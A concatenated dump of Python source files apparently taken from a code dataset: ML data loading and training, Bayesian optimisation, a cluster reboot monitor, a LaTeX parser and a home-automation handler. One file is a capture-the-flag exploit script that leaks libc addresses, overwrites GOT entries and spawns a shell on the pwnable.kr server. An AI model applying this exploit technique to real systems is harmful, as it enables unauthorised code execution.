test_set_ids.append((vid, sid))\n\n # partition the training, valid and tesembeddingsall sequences will be padded/truncated to 15 steps\n # data will have shape (dataset_size, max_len, feature_dim)\n max_len = max_len_audio\n train_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in train_set_ids if covarep['covarep'][vid][sid]], axis=0)\n valid_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in valid_set_ids if covarep['covarep'][vid][sid]], axis=0)\n test_set_audio = np.stack([pad(covarep['covarep'][vid][sid], max_len) for (vid, sid) in test_set_ids if covarep['covarep'][vid][sid]], axis=0)\n\n max_len = max_len_visual\n train_set_visual = np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in train_set_ids], axis=0)\n valid_set_visual = np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in valid_set_ids], axis=0)\n test_set_visual = np.stack([pad(facet['facet'][vid][sid], max_len) for (vid, sid) in test_set_ids], axis=0)\n\n max_len = max_len_text\n train_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in train_set_ids], axis=0)\n valid_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in valid_set_ids], axis=0)\n test_set_text = np.stack([pad(embeddings['embeddings'][vid][sid], max_len) for (vid, sid) in test_set_ids], axis=0)\n # binarize the sentiment scores for binary classification task\n y_train = np.array([sentiments[vid][sid] for (vid, sid) in train_set_ids]) > 0\n y_valid = np.array([sentiments[vid][sid] for (vid, sid) in valid_set_ids]) > 0\n y_test = np.array([sentiments[vid][sid] for (vid, sid) in test_set_ids]) > 0\n\n # train_set_audio = train_set_audio[:,:,1:35]\n # valid_set_audio = valid_set_audio[:,:,1:35]\n # test_set_audio = test_set_audio[:,:,1:35]\n\n visual_max = np.max(np.max(np.abs(train_set_visual), axis=0), axis=0)\n visual_max[visual_max==0] = 1 # if the maximum is 0 we don't normalize this dimension\n train_set_visual = train_set_visual / visual_max\n valid_set_visual = valid_set_visual / visual_max\n test_set_visual = test_set_visual / visual_max\n\n train_set_visual[train_set_visual != train_set_visual] = 0\n valid_set_visual[valid_set_visual != valid_set_visual] = 0\n test_set_visual[test_set_visual != test_set_visual] = 0\n\n audio_max = np.max(np.max(np.abs(train_set_audio), axis=0), axis=0)\n audio_max[audio_max==0] = 1\n train_set_audio = train_set_audio / audio_max\n valid_set_audio = valid_set_audio / audio_max\n test_set_audio = test_set_audio / audio_max\n\n train_set_audio[train_set_audio != train_set_audio] = 0\n valid_set_audio[valid_set_audio != valid_set_audio] = 0\n test_set_audio[test_set_audio != test_set_audio] = 0\n\n return train_set_audio, valid_set_audio, test_set_audio, train_set_text, valid_set_text, test_set_text, train_set_visual, valid_set_visual, test_set_visual, y_train, y_valid, y_test","sub_path":"fusion/multimodaldata.py","file_name":"multimodaldata.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"618459404","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom PatchCreator import PATCH_SIZE\nfrom Paths import *\n\n\ndef train_net():\n input_shape = (PATCH_SIZE, PATCH_SIZE, 1)\n\n model = Sequential()\n # this applies 32 convolution filters of size 3x3 each.\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\n train_datagen = ImageDataGenerator(rescale=1./255)\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n train_data_dir = OUTPUT_PATH + TRAIN_PATH\n validation_data_dir = OUTPUT_PATH + VAL_PATH\n\n nb_train_samples = 43680\n nb_validation_samples = 20000\n epochs = 50 # 10\n batch_size = 32\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(PATCH_SIZE, PATCH_SIZE),\n batch_size=batch_size,\n class_mode='categorical',\n classes=['liver', 'non_liver'],\n color_mode=\"grayscale\")\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(PATCH_SIZE, PATCH_SIZE),\n batch_size=batch_size,\n class_mode='categorical',\n classes=['liver', 'non_liver'],\n color_mode=\"grayscale\")\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples//batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples//batch_size)\n\n model.save('liver_vgg_model_wide.h5')\n\n # score = model.evaluate_generator(validation_generator, nb_validation_samples)\n # print(score)\n\n\nif __name__ == \"__main__\":\n train_net()\n","sub_path":"netTrain.py","file_name":"netTrain.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"158386522","text":"\"\"\" bayesianOptimization.py\n\nBayesian optimisation of cost functions.\n\"\"\"\n\nimport numpy as np\nimport sklearn.gaussian_process as gp\nfrom acquisitionFunction import expectedImprovement, probabilityImprovement\n\n\"\"\" bayesianOptimisation\n\n Uses Gaussian Processes to optimise the loss function `sample_loss`.\n\n Arguments:\n ----------\n n_iters: integer.\n Number of iterations to run the search algorithm.\n costFunction: function.\n Function to be optimized.\n bounds: array-like, shape = [n_params, 2].\n Lower and upper bounds on the parameters of the function `sample_loss`.\n n_params: integer.\n Number of parameters to be optimized\n x0: array-like, shape = [n_pre_samples, n_params].\n Array of initial points to sample the loss function for. If None, randomly\n samples from the loss function.\n n_pre_samples: integer.\n If x0 is None, samples `n_pre_samples` initial points from the loss function.\n gp: sklearn.gaussian_process.gpr.GaussianProcessRegressor.\n Predefined object from GaussianProcessRegressor class that represents Gaussian process model.\n alpha: double.\n Variance of the error term of the GP.\n acquisitionFunction: string.\n Choose the acquisitionFunction to optimize and retreive the next best sample from the gaussian process,\n either 'expected_improvement' or 'probability_improvement'.\n random_search: integer.\n Flag that indicates whether to perform random search or L-BFGS-B optimisation\n over the acquisition function.\n epsilon: double.\n Precision tolerance for floats.\n \"\"\"\n\n\ndef bayesianOptimisation(n_iters, costFunction, bounds, n_params, x0=None, n_pre_samples=10,\n gaussian_process=None, alpha=1e-5, acquisitionFunction='expected_improvement', random_search=False, epsilon=1e-7):\n\n if acquisitionFunction == 'expected_improvement':\n acquisition = expectedImprovement(n_params)\n\n elif acquisitionFunction == 'probability_improvement':\n acquisition = probabilityImprovement(n_params)\n\n else: print('Please input acquisitionFunction \\'expected improvement\\'/\\'probability improvement\\'')\n\n\n x_list = []\n y_list = []\n ybest_list = []\n best_score = np.inf\n\n n_params = bounds.shape[0]\n\n if x0 is None:\n for params in np.random.uniform(bounds[:, 0], bounds[:, 1], (n_pre_samples, bounds.shape[0])):\n x_list.append(params)\n y_list.append(costFunction(params, plot=True))\n else:\n for params in x0:\n x_list.append(params)\n y_list.append(costFunction(params, plot=True))\n\n xp = np.array(x_list)\n yp = np.array(y_list)\n\n # Create the GP\n\n if gaussian_process is not None:\n model = gaussian_process #gp.GaussianProcessRegressor(**gp_params)\n if 'X_train_' in dir(gp):\n xp = model.X_train_\n yp = model.y_train_ + model.y_train_mean\n\n else:\n # kernel = gp.kernels.Matern(length_scale = [100,10000,10000000,1,1,1,1,1,1,1])\n # kernel = gp.kernels.Sum(gp.kernels.Matern(),gp.kernels.Matern()) \n kernel = gp.kernels.Matern(length_scale=1.0)\n # kernel = gp.kernels.RBF(length_scale=0.1)\n # kernel = gp.kernels.DotProduct(1,1)\n\n model = gp.GaussianProcessRegressor(kernel=kernel,\n alpha=alpha,\n n_restarts_optimizer=10,\n normalize_y=True)\n\n for n in range(n_iters):\n print(\"Iteration\", n)\n model.fit(xp, yp)\n\n # Sample next hyperparameter\n if random_search:\n x_random = np.random.uniform(bounds[:, 0], bounds[:, 1], size=(random_search, n_params))\n ei = -1 * acquisition.sampleFunction(x_random, model, yp)\n next_sample = x_random[np.argmax(ei), :]\n \n else:\n next_sample = acquisition.optimizeAcquisition(model, yp, bounds=bounds, n_restarts=10)\n\n # Duplicates will break the GP. In case of a duplicate, we will randomly sample a next query point.\n if np.all(np.abs(next_sample - xp) <= epsilon):\n print('duplicate')\n next_sample = np.random.uniform(bounds[:, 0], bounds[:, 1], bounds.shape[0])\n \n\n # Sample loss for new set of parameters\n cv_score = costFunction(next_sample,plot=True)\n if cv_score < best_score:\n best_score = cv_score\n\n # Update lists\n x_list.append(next_sample)\n y_list.append(cv_score)\n ybest_list.append(best_score)\n\n # Update xp and yp\n xp = np.array(x_list)\n yp = np.array(y_list)\n ybest = np.array(ybest_list)\n return xp, yp, ybest, model\n\nif __name__ == '__main__':\n pass","sub_path":"bayesianOptimization.py","file_name":"bayesianOptimization.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"270081629","text":"\"\"\"Treadmill reboot monitor.\n\nThe monitor will watch a /reboots/<hostname> Zookeeper node.\n\nIf the node exists, and created after server was rebooted, node will reboot.\n\nIf the node exists but is created before server was rebooted, node will be\ndeleted (as server was rebooted already).\n\nActual reboot procedure is specified in command line. Prior to invoking\nthe plugin, perform graceful shutdown.\n\"\"\"\n\n\nimport logging\nimport os\nimport time\n\nimport click\n\nfrom .. import context\nfrom .. import exc\nfrom .. import sysinfo\nfrom .. import zkutils\nfrom .. import zknamespace as z\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef init():\n \"\"\"Top level command handler.\"\"\"\n\n # TODO: main is too long, need to be refactored.\n #\n # pylint: disable=R0915\n @click.command()\n @click.argument('command', nargs=-1)\n def reboot_monitor(command):\n \"\"\"Runs node reboot monitor.\"\"\"\n reboot_cmd = list(command)\n _LOGGER.info('Initializing reboot monitor: %r', reboot_cmd)\n\n zkclient = context.GLOBAL.zk.conn\n zkclient.add_listener(zkutils.exit_on_lost)\n\n while not zkclient.exists(z.REBOOTS):\n _LOGGER.warn('%r node not created yet. Cell masters running?',\n z.REBOOTS)\n time.sleep(30)\n\n hostname = sysinfo.hostname()\n up_since = sysinfo.up_since()\n\n _LOGGER.info('Server: %s, up since: %s', hostname, up_since)\n reboot_path = z.path.reboot(hostname)\n\n @zkclient.DataWatch(reboot_path)\n @exc.exit_on_unhandled\n def _watch_version(_data, stat, event):\n \"\"\"Watch reboot node.\"\"\"\n\n # If the node is deleted, we exit to pick up new version code.\n if event is not None and event.type == 'DELETED':\n _LOGGER.info('Node deleted, ignore.')\n return True\n\n if not stat:\n _LOGGER.info('Node does not exist, ignore.')\n return True\n\n if stat.created > up_since:\n _LOGGER.info('Reboot requested at: %s, up since: %s',\n time.ctime(stat.created),\n time.ctime(up_since))\n\n # Strictly speaking this is not enough for graceful shutdown.\n #\n # We need a proper shutdown procedure developed.\n presence_path = z.path.server_presence(hostname)\n _LOGGER.info('Deleting server presence: %s', presence_path)\n zkutils.ensure_deleted(zkclient, presence_path)\n\n _LOGGER.info('Checking blackout list.')\n zk_blackout_path = z.path.blackedout_server(hostname)\n while zkclient.exists(zk_blackout_path):\n _LOGGER.info('Node blacked out - will wait.')\n time.sleep(60)\n\n _LOGGER.info('exec: %r', reboot_cmd)\n os.execvp(reboot_cmd[0], reboot_cmd)\n else:\n _LOGGER.info('Reboot success, requested at %s, up since: %s',\n stat.created, up_since)\n zkutils.ensure_deleted(zkclient, reboot_path)\n _LOGGER.info('Deleting zknode: %r', reboot_path)\n\n return True\n\n while True:\n time.sleep(100000)\n\n _LOGGER.info('service shutdown.')\n\n return reboot_monitor\n","sub_path":"treadmill/sproc/reboot_monitor.py","file_name":"reboot_monitor.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"403090057","text":"'''\npwnables.kr - brain fuck\n\nWriteup: https://ginjabenjamin.github.io/pwn/2017/06/15/pwnableskr-brain-fuck\n'''\nfrom pwn import *\n\n# libc values; readelf -s bf_libc.so | grep [function]\nlibc = ELF(\"./bf_libc.so\")\n\noffsetSystem = libc.symbols['system'] # = 0x0003a920\noffsetFgets = libc.symbols['fgets'] # = 0x0005d540\n\n# Addresses (bf)\nbfMain = 0x08048671 # objdump -d bf | grep main\nbfDo_brainfuck = 0x080485dc # objdump -d bf | grep do_brainfuck\nbfFgets = 0x0804a010\nbfMemset = 0x0804a02c\nbfTape = 0x0804a0a0\n\nDEBUG = 1\n\nif(len(sys.argv) > 1 and sys.argv[1] == 'pwn'):\n p = remote('pwnable.kr', 9001)\nelse:\n p = process('./bf')\n\np.recvuntil('[ ]\\n')\n\n# Move from input string (tape) to fgets@GOT\npayload = '<'*(bfTape - bfFgets)\n\n# Leak fgets@GOT\npayload += '.>'*4 # Read fgets())\npayload += '<'*4 # Move back to fgets())\n\n# Change fgets@GOT to system@GOT\npayload += ',>'*4 # Overwrite fgets() with system()\npayload += '<'*4 # Move back to fgets())\n\n# Change memset@GOT to fgets@GOT\npayload += '>'*(bfMemset - bfFgets) # Move to memset()\npayload += ',>'*4 # Overwrite memset() with fgets()\n\n# Change putchar@GOT to main()\npayload += ',>'*4 # Overwrite putchar() with main()\n\n# Call putchar() which invokes main()\npayload += '.'\n\n# Setup attack\np.sendline(payload)\n\n# Read address of fgets()\naddrFgets = int(p.recvn(4)[::-1].encode('hex'), 16)\nlog.info('fgets@GOT: ' + str(addrFgets))\n\naddrSystem = addrFgets - offsetFgets + offsetSystem\n#log.info('system: ' + str(hex(addrSystem)))\n\n# Submit our stack frame\np.send(p32(addrSystem)) # Call system()\np.send(p32(addrFgets - offsetFgets + libc.symbols['gets'])) # Canary\np.send(p32(bfMain)) # Return to main()\np.sendline('/bin/sh') # Argument for system()\n\np.interactive()\n","sub_path":"objects/pwnableskr-brain-fuck/brainfuck-solve.py","file_name":"brainfuck-solve.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"533792360","text":"#!/usr/bin/env python\n\n# T e x S c a n n e r . p y\n#\n# Defines a TexScanner class that can be used to extract LaTeX directives\n# from a .tex file. Call SetFile() to supply a reference to an already\n# open .tex file, then use successive calls to GetNextTexCommand() to get \n# all the tex directives and their parameters from the file. This probably\n# isn't of very general utility when it comes to parsing .tex files, but\n# it is useful for the ADASS editing purposes for which it was written,\n# where all that was wanted was to find graphics or citation commands and\n# see what files or references they were using.\n#\n# Parsing LaTeX files is tricky, and this code isn't perfect by any means.\n# There are lots of constructs that will fool it, usually into missing\n# commands that it ought to spot. If it manages to spot any problems, this\n# can be checked using a call to ParsedOK() and details of any problem can\n# be obtained by calling GetReport(). In testing, I have seen this parser\n# complain about unclosed braces that turn out to be due to an unescaped\n# comment character that LaTeX has not complained about. (Parsing problems\n# often seem to be associated with the use of '{','[' and '%' in math\n# expressions, and it may be that the parser needs to know about math mode.)\n# This code would benefit from a proper review and possible reworking some day.\n#\n# History:\n# 14th Jan 2016. Original version, KS.\n# 28th Jan 2016. GetNextWord() now allows for nesting. GetNextTexCommand()\n# now allows for any number of required and/or optional\n# arguments. The list it returns can be of any length, not\n# always one of three items, so calling code will need to\n# be modified. KS.\n# 1st Feb 2016. Interface to GetNextTexCommand() reworked to use a\n# callback for each new command found. This should make it\n# easier to introduce a recursive scan that catches commands\n# included within the arguments to other commands, although\n# at the moment this is not implemented. KS.\n# 11th Feb 2016. GetTexCommand() now does do a recursive scan through the\n# arguments of the commands it finds. KS.\n# 16th Feb 2016. Now catches multiple LaTeX directives in one argument, eg\n# \\citetext{\\citealp{l1980}, implemented in \\citealp{w12}}\n# 30th Mar 2016. Now checks to see if '%' characters are comment characters\n# or just literal '%' that have been escaped. KS.\n# 7th Apr 2016. Fixed obscure parsing bug triggered by the sequence \n# \"$\\mu$m\" which caused the scanning of the string containing\n# it to be terminated prematurely. It's because the code\n# had assumed that all \\directives would be terminated by\n# a line break, space, or a '{' or '[', which is not of\n# course the case. Strange it took this long to show up. KS.\n# 12th Apr 2016. GetNextChar() now intercepts \"\\n\" characters and treats\n# them as spaces - this is essentially what LaTeX does. KS.\n# 2nd May 2016. Fixed a parsing problem where a slightly unusual sequence\n# (involving a \\newcommand definition on a single line} sent\n# the parser into infinite recursion. KS.\n# 24th Jul 2017. Fixed a problem seen in a .tex file that had an equation\n# that involved an escaped brace '\\{' character. This was\n# being treated as a delimiter, with unfortunate results.\n# WasEscaped now records if the last character, as returned\n# by GetNextChar(), was escaped, and GetNextWord() uses this\n# to ignore escaped braces and parentheses. KS.\n# 25th Jul 2017. Added a check for a parser runaway, and the routines\n# ParsedOK() and GetReport(). GetNextWordFromString{} now\n# has the same tests for escaped braces as used by\n# GetNextWord(). KS.\n# 15th Aug 2017. Converted to run under Python3, using 2to3. Added\n# the importing of items from __future__ to allow this to\n# run under either Python2 or Python3. (In actuality, this\n# code worked unchanged under Python3, and since it doesn't\n# use print, doesn't really need that future import, but it\n# seems to be good practice anyway.) KS.\n#\n\nfrom __future__ import (print_function,division,absolute_import)\n\nimport os\nimport sys\nimport string\n\nclass TexScanner(object):\n\n def __init__(self):\n self.FileIdSet = False\n self.Escaped = False\n self.WasEscaped = False\n self.LastChar = \"\"\n self.LastWord = \"\"\n self.Line = 0\n self.Problems = []\n \n def SetFile(self,FileId) :\n \n # Needs to be called before any of the Get... routines. This passes\n # the Id of an open .tex file to the scanner.\n \n self.FileId = FileId\n self.FileIdSet = True\n self.Line = 0\n self.Problems = []\n \n def ParsedOK(self) :\n \n # Returns True if the .tex file parsed without problems. If it returns\n # False, GetReport() can be called to get a description of what happened.\n \n return (len(self.Problems) == 0)\n \n def GetReport(self) :\n \n # If the file parsed with problems, this returns a list of strings that\n # describe what happened. If the file parsed OK, this returns an empty\n # list.\n \n return self.Problems\n \n def GetNextChar(self) :\n \n # Returns the next character from a .tex file. If a comment character\n # ('%') is encountered, this skips to the end of the current line and\n # returns the newline character at the end. If the end of the file is\n # reached, or if the file is not open, this returns an empty string. \n # Allow for the case where the comment character was escaped, in which\n # case treat it as a literal '%'. LaTeX treats an end of line like a \n # space, and we intercept \"\\n\" characters and turn them into spaces to\n # get the same effect.\n \n Char = \"\"\n if (self.FileIdSet) :\n Char = self.FileId.read(1)\n if (Char == \"%\") :\n if (not self.Escaped) :\n while (True) :\n Char = self.FileId.read(1)\n if (Char == \"\\n\" or Char == \"\") : break\n self.WasEscaped = self.Escaped\n self.Escaped = (Char == \"\\\\\")\n if (Char == \"\\n\") :\n Char = \" \"\n self.Line = self.Line + 1\n return Char \n \n def GetNextLine(self) :\n \n # Returns the next line from a .tex file, with comments stripped out.\n # This means anything in a line from the first '%' character up to but\n # not including the final newline character is removed from the line.\n # It does mean than a line that starts with a '%' is returned as a\n # blank line - just a newline; it is not ignored completely. If the\n # end of the file is reached, or the file is not open, this returns\n # an empty string. (Note that this routine isn't used any more by the\n # other routines in this file, although it was originally.)\n \n Result = \"\"\n while (True) :\n Char = self.GetNextChar()\n Result = Result + Char\n if (Char == \"\\n\" or Char == \"\") : break\n return Result\n \n def GetNextWord(self):\n \n # Returns the next 'word' from a .tex file. Comments are ignored, and\n # a 'word' is defined slightly unusually here in order to help with\n # processing LaTeX directives. Anything enclosed in {} or in []\n # braces or brackets, including the enclosing {} or [] is considered\n # a word. Blanks and { and [ characters delimit words, as do the \n # ends of lines, which are assumed to be one or more of \\n and \\r\n # characters. Ends of lines are removed when encountered within\n # {} or [] characters.\n \n Word = \"\"\n \n # Find the first non-blank character (treating newline characters\n # and carriage returns as blanks).\n \n while (True) :\n if (self.LastChar != \"\") :\n Char = self.LastChar\n else :\n Char = self.GetNextChar()\n self.LastChar = \"\"\n if (Char != \" \" and Char != \"\\n\" and Char != \"\\r\") : break\n if (Char != \"\") :\n Word = Word + Char\n \n # If the word started with a { or [, then we ignore blanks and\n # keep going until we hit the corresponding closing character\n # (or the end of the file). Allow for nesting. Note that when\n # GetNextChar() returns an empty string, that's the end of the file.\n \n Escaped = self.WasEscaped\n if ((Char == \"{\" or Char == \"[\") and not Escaped) :\n Start = Char\n if (Start == \"{\") : End = \"}\"\n if (Start == \"[\") : End = \"]\"\n Nesting = 1\n Line = self.Line + 1\n while (True) :\n Char = self.GetNextChar()\n if (Char == \"\") :\n self.Problems.append(\n \"The file appears to have an unclosed '\" \\\n + Start + \"' in line \" + str(Line))\n self.Problems.append(\"The file may be missing a '\" + End + \\\n \"' character or there may\")\n self.Problems.append(\n \"be a problem with nested braces or with '%' characters\")\n break\n Escaped = self.WasEscaped\n if (Char != '\\n' and Char != '\\r') : Word = Word + Char\n if (Char == Start and not Escaped) : Nesting = Nesting + 1\n if (Char == End and not Escaped) :\n Nesting = Nesting - 1\n if (Nesting <= 0) : break\n \n else :\n\n # Otherwise, just keep going until we hit a blank or one of\n # the delimiting braces. Either of these will terminate the word,\n # but if it was a brace, we need to remember it for the next\n # time we're called. \n\n while (True) :\n Char = self.GetNextChar()\n Escaped = self.WasEscaped\n if (Char == \"\") : break\n if (Char == \" \" or Char == '\\r' or Char == '\\n') : break\n if ((Char == \"{\" or Char == \"[\") and not Escaped) :\n self.LastChar = Char\n break\n Word = Word + Char\n return Word\n \n def GetNextTexCommand(self,Callback,ClientData,ClientExtra) :\n \n # Searches for the next Tex/LaTeX command read from the open .tex file.\n # and calls the specified callback routine with the details of the\n # command. The callback routine is called with a first argument that\n # gives the command details, followed by the arguments supplied \n # as ClientData and ClientExtra. The command details are supplied \n # as a list of strings. The first is the LaTeX directive, beginning\n # with '\\'. Subsequent strings are the arguments that followed\n # the directive, either {required} (in curly braces) or [optional]\n # (in square brackets). The arguments are returned with the beginning\n # and ending braces included. If the end of the file is reached, this\n # routine returns True; otherwise it returns False.\n #\n # Because the arguments for the LaTeX command may themselves contain\n # further LaTeX commands, this routine also searches recursively\n # through each argument, and will call the callback routine for each\n # command found. To get every LaTeX command in the .tex file, this\n # routine should continue to be called until it returns True.\n #\n # Callback can be passed as None, in which case no callback is made -\n # this can be used for a quick check that the file can be parsed.\n \n Finished = True\n Command = []\n Directive = \"\"\n while (True) :\n if (self.LastWord == \"\") :\n Word = self.GetNextWord()\n else :\n Word = self.LastWord\n self.LastWord = \"\"\n if (Word == \"\") : break\n # (This doesn't handle the case where there are multiple directives\n # in the one word, eg \"\\it{text}\\emph{text}\". It will only find\n # the first.)\n BSlashIndex = Word.find('\\\\')\n if (BSlashIndex >= 0) :\n Directive = Word[BSlashIndex:]\n break\n if (Directive != \"\") :\n Command.append(Directive)\n Word = self.GetNextWord()\n while (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n Command.append(Word)\n \n # Search each argument recursively for any LaTeX commands\n # it may contain.\n \n Word = Word[1:len(Word) - 1]\n self.GetNextTexCommandFromString(Word,\\\n Callback,ClientData,ClientExtra)\n Word = self.GetNextWord()\n else :\n self.LastWord = Word\n break\n if (Callback != None) : Callback(Command,ClientData,ClientExtra)\n Finished = False\n return Finished\n \n def GetNextWordFromString(self, String, Posn):\n \n # Returns the next 'word' from a string, given the string and a start\n # position in the string. It is assumed that the string contains no\n # comments. A 'word' is defined slightly unusually here in order to \n # help with processing LaTeX directives. Anything enclosed in {} or\n # in [] braces or brackets, including the enclosing {} or [] is \n # considered a word. Blanks and { and [ characters delimit words.\n # This routine returns a pair comprising the word and the value\n # for Posn to be used for the next call. When the end of the string\n # is reached, the pair returned is (\"\",0). The Posn value starts from\n # 0, in the usual Python way.\n #\n # This code is similar in structure to GetNextWord(), but it's easier\n # to move around in a string than it is in a file. Note the assumption\n # that this will be used mainly on words that have been obtained via\n # GetNextWord() and so will already have things like comments stripped\n # out. The intent is that this will be used recursively to split up\n # words that themselves contain LaTeX commands, eg\n # \\center{\\it{text}\\cite{ref}}\n # where GetNextWord will find \"\\center\" and then \"{\\it{text}\\cite{ref}}\"\n # and we need to use this routine to split up that nested second word.\n \n Word = \"\"\n Char = \"\"\n Escaped = False\n if (Posn > 0) :\n Escaped = (String[Posn - 1] == '\\\\')\n \n # Find the first non-blank character.\n \n Index = Posn\n while (Index < len(String)) :\n Char = String[Index]\n Index = Index + 1\n if (Char != \" \") : \n Word = Word + Char\n Escaped = (Char == '\\\\')\n break\n \n # See if we found anything. If not, quit now.\n \n if (Word != \"\") :\n \n # If the word started with a { or [, then we ignore blanks and\n # keep going until we hit the corresponding closing character\n # (or the end of the string). Allow for nesting.\n \n if (Char == \"{\" or Char == \"[\") :\n Start = Char\n if (Start == \"{\") : End = \"}\"\n if (Start == \"[\") : End = \"]\"\n Nesting = 1\n while (Index < len(String)) :\n Char = String[Index]\n Index = Index + 1\n if (Char == \"\") : break\n Word = Word + Char\n if ((Char == Start) and not Escaped) : Nesting = Nesting + 1\n if ((Char == End) and not Escaped) :\n Nesting = Nesting - 1\n if (Nesting <= 0) : break\n Escaped = (Char == '\\\\')\n \n else :\n\n # Otherwise, just keep going until we hit a blank or one of\n # the delimiting braces. Either of these will terminate the word,\n\n while (Index < len(String)) :\n Char = String[Index]\n if (Char == \" \") : break\n if ((Char == \"{\" or Char == \"[\") and not Escaped) : break\n Index = Index + 1\n Word = Word + Char\n Escaped = (Char == '\\\\')\n\n if (Word == \"\") : Index = 0\n \n return (Word,Index)\n\n def GetNextTexCommandFromString(self,\\\n String,Callback,ClientData,ClientExtra) :\n \n # This is similar to GetNextTexCommand(), except that it works not on\n # a file but on a string, and it works recursively, calling itself\n # to search the arguments of any command to see if they themselves\n # contain more commands. Each time a command is found, the specified\n # callback routine is called with the command details and the client\n # arguments, just as for GetNextTexCommand(). Callback can be passed\n # as None, in which case no callback is made - this can be used for a\n # quick check that the file can be parsed.\n \n Posn = 0\n More = True\n while (More) :\n Directive = \"\"\n Command = []\n\n # Apart from the recursion, this code follows the general lines of\n # GetNextTexCommand().\n\n while (True) :\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word == \"\") : break\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n BSlashIndex = Word.find('\\\\')\n if (BSlashIndex >= 0) :\n Directive = Word[BSlashIndex:]\n break\n More = False\n if (Directive != \"\") :\n Command.append(Directive)\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n while (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n Command.append(Word)\n WordPair = self.GetNextWordFromString(String,Posn)\n Word = WordPair[0]\n Posn = WordPair[1]\n if (Word != \"\") :\n if (Word[0] == '[' or Word[0] == '{') :\n self.GetNextTexCommandFromString(Word[1:len(Word) - 1],\\\n Callback,ClientData,ClientExtra)\n More = False\n if (String[Posn:].strip(\" \\\\r\\\\n\") != \"\") : More = True\n else :\n More = True\n break\n if (Callback != None) : Callback(Command,ClientData,ClientExtra)\n \n","sub_path":"Author_Template/TexScanner.py","file_name":"TexScanner.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"310330430","text":"\"\"\"Manage outbound ON command to a device.\"\"\"\nimport asyncio\n\nfrom .. import ack_handler, status_handler\nfrom ... import pub\nfrom ...constants import MessageFlagType, ResponseStatus\nfrom ...topics import STATUS_REQUEST\nfrom .direct_command import DirectCommandHandlerBase\n\n\nclass StatusRequestCommand(DirectCommandHandlerBase):\n \"\"\"Manage an outbound Status command to a device.\"\"\"\n\n def __init__(self, address, status_type: int = 0):\n \"\"\"Init the OnLevelCommand class.\"\"\"\n super().__init__(topic=STATUS_REQUEST, address=address, group=None)\n self._status_type = status_type\n self._subscriber_topic = f\"handler.{self._address.id}.{self._status_type}.{STATUS_REQUEST}.{str(MessageFlagType.DIRECT).lower()}\"\n\n # pylint: disable=arguments-differ, useless-super-delegation\n async def async_send(self):\n \"\"\"Send the ON command async.\"\"\"\n return await super().async_send(status_type=self._status_type)\n\n @ack_handler\n async def async_handle_ack(self, cmd1, cmd2, user_data):\n \"\"\"Handle the message ACK.\"\"\"\n if cmd2 == self._status_type:\n await super().async_handle_ack(cmd1=cmd1, cmd2=cmd2, user_data=user_data)\n\n @status_handler\n async def async_handle_direct_ack(self, topic=pub.AUTO_TOPIC, **kwargs):\n \"\"\"Handle the Status Request response direct ACK.\n\n This handler listens to all topics for a device therefore we need to\n confirm the message is a status response.\n \"\"\"\n # Need to make sure the ACK has time to aquire the lock\n await asyncio.sleep(0.06)\n if not self._response_lock.locked():\n return\n\n msg_type = topic.name.split(\".\")[-1]\n if msg_type != str(MessageFlagType.DIRECT_ACK):\n return\n\n self._direct_response.put_nowait(ResponseStatus.SUCCESS)\n\n cmd1 = kwargs.get(\"cmd1\")\n cmd2 = kwargs.get(\"cmd2\")\n self._call_subscribers(db_version=cmd1, 